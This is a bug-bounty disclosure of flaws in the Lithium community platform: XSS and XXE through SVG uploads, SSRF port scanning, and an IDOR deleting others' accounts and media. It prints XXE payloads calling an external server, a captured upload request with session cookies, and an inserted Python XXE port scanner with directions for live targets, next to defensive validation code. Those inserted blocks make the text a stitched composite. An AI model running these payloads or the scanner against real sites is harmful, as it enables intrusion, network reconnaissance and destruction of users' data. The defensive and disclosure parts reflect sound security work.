
Journey With Lithium Bugs

This is a journey which started in 2016, when I first found a vulnerability in the community site of one of the Bugcrowd programs. At that time I did not realize that the vulnerabilities I found on that Bugcrowd program would apply to many other sites such as AT&T, PayPal, Ubnt, SquareUp, SONY, Spotify and more, and would bring me a total of $8000 from various companies and sites. The journey is still on. In 2016-17 I found five vulnerabilities in that Bugcrowd program. They are:

Vulnerability 1) XXE after uploading an SVG file

Vulnerability 2) Delete any user account permanently

Vulnerability 3) Change and delete anyone's profile image

Vulnerability 4) Delete videos of other users

Vulnerability 5) Lithium Forum Server-Side Request Forgery

Soon after, I realized that the bugs were in the Lithium Community Platform itself. I reported them to Lithium and got no reply for two months. In my experience Lithium handles vulnerabilities in its product badly: there is no proper response to researchers who disclose vulnerabilities to them, they do not care whether a vulnerability is critical, and they fix vulnerabilities quarterly rather than immediately. Later I asked CIRT to provide a CVE ID, but they told me that they do not provide CVE IDs for SaaS products. In the end I decided to report the bugs to all of the Lithium clients that have a bug bounty. I found that around 400+ organisations use Lithium products, but very few, around 10, have a bug bounty program. I reported all five of the above vulnerabilities to those 10 organisations, including AT&T, Spotify, Ubnt, PayPal and some private programs, and collected $8000 for those bugs, not from Lithium but from Lithium's clients.

Now it is 2019 and I have again found a critical vulnerability; a write-up and disclosure will follow soon.


About the Lithium proprietary community platform product:

Lithium Technologies sells its proprietary community platform as a SaaS product. See http://www.lithium.com/ for more information about the product.

https://en.wikipedia.org/wiki/Lithium_Technologies

Vulnerability 1: XXE in community.{site}.com

The Lithium community platform at community.{site}.com has functionality to upload avatars and images, and it accepts SVG files. An SVG file is XML, so when one is uploaded the server-side XML parser parses it, including any DOCTYPE and entity declarations it carries. This results in XXE, which can have severe consequences: an attacker can scan internal and remote ports, make the server fetch an attacker-hosted DTD, tie up the server with FTP connections (FTP DoS) and more. Below are the ones I was able to prove:

1) Proved out-of-band (OOB) XXE: the server made a connection to my server vps0007.dasaweb.co.uk

2) Proved SSRF and port scanning

3) Proved FTP DoS, as FTP connections were made to my server vps0007.dasaweb.co.uk

4) Sensitive information disclosure

STEP BY STEP POC:

1) Log in to community.{site}.com

Go to either https://community.{site}.com/t5/media/gallerypage/user-id/61xxxx or https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

The image upload option is at https://community.{site}.com/t5/media/gallerypage/user-id/61xxxx

The avatar upload option is at https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

2) I uploaded an SVG file with the source below. After uploading it, I could access it publicly, and the embedded script executed (stored XSS).

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,320 240,0" fill="#009900" stroke="#004400"/>
   <!-- the script element runs when the uploaded SVG is opened directly in the browser -->
   <script type="text/javascript">
      prompt('password please!');
   </script>
</svg>

After getting XSS from the SVG file, my second thought was to try XXE. I embedded the XXE payload (the one visible in the intercepted request further below) in the SVG file and found that a request arrived at my server.


3) Upload it through the Browse option of either the add-image or the avatar upload.

4) I saw the request arrive on my server, where netcat was listening, from ams1-nat.lithium.com.

5) Now change the XML in the SVG file to point the entity at an FTP URL:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "FTP://vps0007.dasaweb.co.uk:9001/data.xml">
]>
<r>&sp;</r>

6) Upload it and check the request on my server, where netcat was listening, coming from ams1-nat.lithium.com:

listening on [37.59.68.106] 9001 ...

connect to [37.59.68.106] from ams1-nat.lithium.com [46.19.168.9] 55535

Since the server follows FTP URLs, this can be abused for FTP DoS.

7) Now intercept the SVG upload request in Burp and send it to Intruder. The § markers in the payload below are Intruder's payload positions.

The request will look like this:

POST /t5/user/myprofilepage.imageuploadeditor:uploadimage?t:ac=tab/user-icons&t:cp=block/propertyeditblocks HTTP/1.1
Host: community.{site}.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Referer: https://community.{site}.com/t5/user/myprofilepage/tab/user-icons
Content-Length: 988
Content-Type: multipart/form-data; boundary=---------------------------39612053628921
Cookie: optimizelyEndUserId=oeu1481831612267r0.5301134228318806; optimizelySegments=%7B%226174980032%22%3A%22referral%22%2C%226176630028%22%3A%22none%22%2C%226179250069%22%3A%22false%22%2C%226161020302%22%3A%22ff%22%7D; optimizelyBuckets=%7B%7D; _ga=GA1.2.856307035.1481831613; LithiumVisitor=~2mlCxJIBDYkI66Wpk~jJhAOVlH9wU3MOi6b0s0_wN3sAvU6am8nS91Ee6z_AFTDxdU4dO7YEIoybEGfdOptsQ6Y_Y8yH4Wt5qwPH-LtQ..; VISITOR_BEACON=~24arMJQ7k9e6Vls0T~1nsUYDVR1GQM3jnxF1qUNHxWE3Ck1CUe_1KwZuhtwQkwlvJoDYp5vshAyMWRzq1ZS26NHKJ9D0gKBoJcK0e2uA..; spot=%7B%22t%22%3A1483096080%2C%22m%22%3A%22us%22%2C%22p%22%3A%22open%22%2C%22w%22%3A%22%22%7D; sp_t=eabead6d001e35c9554cad2abe1f0e90; __tdev=GY64fzC6; fbm_174829003346=base_domain=.{site}.com; plp=e6e94d678d6ebc404cf77d5b7869462cb0a22231; __sonar=18159967670673728347; __gads=ID=42c92ad7292daba4:T=1483096014:S=ALNI_MaaH3lqaYxvUa3TM7DPX46Zz2Qa-w; sp_fi=1; sp_cc=1; sp_last_utm=%7B%22utm_source%22%3A%22{site}_webplayer%22%2C%22utm_medium%22%3A%22growth_conversion%22%2C%22utm_campaign%22%3A%22trial_accountoverview_all%22%2C%22utm_content%22%3A%22all500003%22%7D; __tumi=b7de3a83508bbe9f6412; {site}_market=uk; LiSESSIONID=09254C4F2C5AA57054F5336916B6103C; sp_dc=AQBo0ZT90RSICQpQvQpAJRz3FCjF9kIb6M0cTqxHkI8NdwCL_AsTUoUTQfatyjCizKmAP7cn2StzDcKwexD4jdG1; lithiumLogin:{site}=~2Y1sAQZ4B8FxaQTm4~rjKz7S1r1pjF_kMrSEjjEvkPNRocgqiBxhzDlT4oJHobkcK7egvELv9KoHpfSH-k; LithiumUserInfo=6161419; LithiumUserSecure=55ad1238-fb6a-4ab6-9ada-b23e8298a837; _gat=1
Connection: close

-----------------------------39612053628921
Content-Disposition: form-data; name="anonAction"

true
-----------------------------39612053628921
Content-Disposition: form-data; name="t:ac"

tab/user-icons
-----------------------------39612053628921
Content-Disposition: form-data; name="t:cp"

block/propertyeditblocks
-----------------------------39612053628921
Content-Disposition: form-data; name="Filename"

xxe_svg.svg
-----------------------------39612053628921
Content-Disposition: form-data; name="Filesize"

251
-----------------------------39612053628921
Content-Disposition: form-data; name="Filedata"; filename="xxe_svg.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "FTP://vps0007.dasaweb.co.uk:§9001§" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
-----------------------------39612053628921--

8) Now fuzz the port; here it is 9001 in FTP://vps0007.dasaweb.co.uk:§9001§

Fuzz it from 20 to 90 in Intruder, and remember to set the number of threads in Intruder to 1 so that the response times of different ports do not overlap. On my server, ports 80, 22 and 23 were open.

In the Intruder results, ports 22, 23 and 80 time out, which means they are open: the server's parser connects and then waits for an FTP reply until its socket timeout expires, whereas a closed port refuses the connection immediately and the upload request returns quickly.

For internal hosts, use 127.0.0.1:{port}. As soon as you do, the server starts scanning itself, disclosing the open ports on the host it runs on.
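The procedure in steps 1 to 8, as an added example that is not part of the original post and not Lithium's code: it builds the same SVG payload for each port, classifies ports by upload timing the way the Intruder run does, and shows the upload-side check that would have rejected both the XSS SVG from step 2 and the XXE SVG. The upload URL, the timeout, the simulated server and the assumed role of the multipart field "Filedata" (the name seen in the captured request) are assumptions; the simulated probe stands in for the real endpoint so the script runs offline.

```python
# Added example (not from the original post): XXE-via-SVG port probing and the
# server-side check that rejects such uploads. Endpoint, field name, timeout and
# the simulated server below are assumptions for illustration.
import time
import urllib.request
import xml.parsers.expat


def build_xxe_svg(host, port, scheme="ftp"):
    """SVG whose external entity makes the server's XML parser connect to host:port."""
    return (
        '<?xml version="1.0" standalone="yes"?>'
        f'<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "{scheme}://{host}:{port}/" > ]>'
        '<svg xmlns="http://www.w3.org/2000/svg" width="500px" height="40px">&xxe;</svg>'
    )


def http_probe(upload_url, cookie, timeout):
    """Return probe(svg) -> seconds: POSTs the SVG as an avatar (assumed endpoint)
    and reports how long the server took to answer."""
    def probe(svg):
        boundary = "----xxeprobe"
        body = (
            f'--{boundary}\r\nContent-Disposition: form-data; name="Filedata"; '
            f'filename="avatar.svg"\r\nContent-Type: image/svg+xml\r\n\r\n{svg}\r\n'
            f'--{boundary}--\r\n'
        ).encode()
        req = urllib.request.Request(
            upload_url, data=body, method="POST",
            headers={"Content-Type": f"multipart/form-data; boundary={boundary}",
                     "Cookie": cookie, "X-Requested-With": "XMLHttpRequest"})
        start = time.monotonic()
        try:
            urllib.request.urlopen(req, timeout=timeout + 5).read()
        except Exception:
            pass  # an error page or a timeout still carries the timing signal
        return time.monotonic() - start
    return probe


def scan_ports(probe, host, ports, timeout):
    """Classify ports by upload duration: on an open port the parser waits for an
    FTP banner until its socket timeout, on a closed port it fails fast.
    Probe one port at a time (one Intruder thread) so timings do not overlap."""
    verdicts = {}
    for port in ports:
        elapsed = probe(build_xxe_svg(host, port))
        verdicts[port] = "open" if elapsed >= timeout else "closed"
    return verdicts


class UnsafeSvg(Exception):
    """Raised when an uploaded SVG carries markup an avatar never needs."""


def check_svg_upload(data):
    """Server-side fix: refuse any DOCTYPE, entity or external reference, and any
    script element or on* event attribute, before the real parser sees the file."""
    def reject(reason):
        def handler(*_args):
            raise UnsafeSvg(reason)
        return handler

    def start_element(name, attrs):
        if name.rpartition(":")[2].lower() == "script":
            raise UnsafeSvg("script element")
        for attr in attrs:
            if attr.lower().startswith("on"):
                raise UnsafeSvg(f"event handler attribute {attr}")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject("DOCTYPE declaration")
    parser.EntityDeclHandler = reject("entity declaration")
    parser.ExternalEntityRefHandler = reject("external entity reference")
    parser.StartElementHandler = start_element
    parser.Parse(data, True)
    return True


def simulated_probe(open_ports, timeout):
    """Constructed stand-in for the vulnerable server: it parses the entity declaration
    exactly as the real parser would and 'hangs' for the full timeout on open ports."""
    class Seen(Exception):
        pass

    def probe(svg):
        def entity_decl(name, is_pe, value, base, system_id, public_id, notation):
            raise Seen(system_id)
        parser = xml.parsers.expat.ParserCreate()
        parser.EntityDeclHandler = entity_decl
        try:
            parser.Parse(svg, True)
        except Seen as hit:
            port = int(hit.args[0].rsplit(":", 1)[1].rstrip("/"))
            return float(timeout) if port in open_ports else 0.05
        raise AssertionError("no entity declaration found in payload")
    return probe


if __name__ == "__main__":
    probe = simulated_probe(open_ports={22, 23, 80}, timeout=5)
    found = scan_ports(probe, "vps0007.dasaweb.co.uk", range(20, 91), timeout=5)
    print("open:", sorted(p for p, v in found.items() if v == "open"))
    for sample in (build_xxe_svg("127.0.0.1", 22), '<svg xmlns="http://www.w3.org/2000/svg"/>'):
        try:
            check_svg_upload(sample)
            print("accepted")
        except UnsafeSvg as why:
            print("rejected:", why)
```

Against a live target, `http_probe(upload_url, cookie, timeout)` replaces `simulated_probe`; the timeout to use is whatever the server's parser takes before giving up on an open port, which you measure once against a port you know is open on your own host. The check in `check_svg_upload` raises from inside the expat callbacks, so the document is abandoned at the first DOCTYPE or entity declaration and no entity is ever resolved.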


Vulnerability 2: IDOR to delete any user's community account, any video, any image

There is a functionality to close your own community account. After you close your account, you can't re-open it. When your account is closed, all kudos, accepted solutions, posts, friends and achievements are permanently deleted. If you later decide to re-join the community, you must re-register and start from scratch. Closing your account immediately logs you out.

In this IDOR, when the user id in the close-account request is replaced with the victim's user id, the victim's account is deleted once the request is processed. This happens because the application does not validate that the user id in the request matches the account holder of the current session, so changing the user id to the victim's id deletes the victim's account.

Similarly, the requests to delete videos and images are keyed by user id, and the same missing check lets you delete other users' videos and images.
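The missing check described above, as an added example that is not from the original post and not Lithium's code: an in-memory version of the close-account and delete-media handlers, first as observed (the user id is taken from the request and trusted), then guarded by one ownership check shared by all three deletion endpoints. The store layout, the admin role and the function names are assumptions.

```python
# Added example (not from the original post): the IDOR in the deletion endpoints and
# the ownership check that closes it. Store, admin role and names are assumptions.
from dataclasses import dataclass, field
from functools import wraps


class Forbidden(Exception):
    """HTTP 403: the session user does not own the target resource."""


class NotFound(Exception):
    """HTTP 404: the target resource does not exist."""


@dataclass
class Store:
    accounts: set = field(default_factory=set)    # live user ids
    media: dict = field(default_factory=dict)     # media id -> owner user id
    admins: set = field(default_factory=set)      # assumed admin role


def close_account_vulnerable(store, session_user, user_id):
    """As observed: user_id comes from the request and is never compared with the session,
    so any logged-in user can close anyone's account."""
    if user_id not in store.accounts:
        raise NotFound(user_id)
    store.accounts.discard(user_id)
    store.media = {m: owner for m, owner in store.media.items() if owner != user_id}
    return {"closed": user_id, "logged_out": session_user == user_id}


def require_owner(owner_of):
    """Decorator: look up who owns the target from the store (never from the request),
    and refuse unless that is the session user or an admin."""
    def wrap(fn):
        @wraps(fn)
        def guarded(store, session_user, target_id):
            owner = owner_of(store, target_id)
            if owner is None:
                raise NotFound(target_id)
            if owner != session_user and session_user not in store.admins:
                raise Forbidden(f"user {session_user} does not own {target_id}")
            return fn(store, session_user, target_id)
        return guarded
    return wrap


@require_owner(lambda store, uid: uid if uid in store.accounts else None)
def close_account(store, session_user, user_id):
    """Fixed close-account: an account is owned by itself, so only its holder may close it."""
    store.accounts.discard(user_id)
    store.media = {m: owner for m, owner in store.media.items() if owner != user_id}
    return {"closed": user_id, "logged_out": session_user == user_id}


@require_owner(lambda store, mid: store.media.get(mid))
def delete_media(store, session_user, media_id):
    """Fixed delete for profile images and videos: the same check keyed by media owner."""
    del store.media[media_id]
    return {"deleted": media_id}


def fresh_store():
    """Constructed sample data: an attacker (1001), a victim (2002) and one item each."""
    return Store(accounts={1001, 2002}, media={"img1": 2002, "vid9": 1001}, admins={9})


if __name__ == "__main__":
    s = fresh_store()
    print(close_account_vulnerable(s, 1001, 2002), sorted(s.accounts))
    s = fresh_store()
    try:
        close_account(s, 1001, 2002)
    except Forbidden as why:
        print("blocked:", why, sorted(s.accounts))
```

The handlers take the session user from the authenticated session and the target id from the request; the guard never uses the request's id to decide ownership, it only uses it to look the owner up. That is the one change needed for all three bugs on this page: account, image and video deletion.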

Rewards and recognition:

Company             Sites              Award & Recognition
Spotify             Community sites    $4000
ING Bank            Many sites         $600
PayPal              Community sites    $500
Ubiquiti Networks   Community          $1500
AT&T                Sites              $1500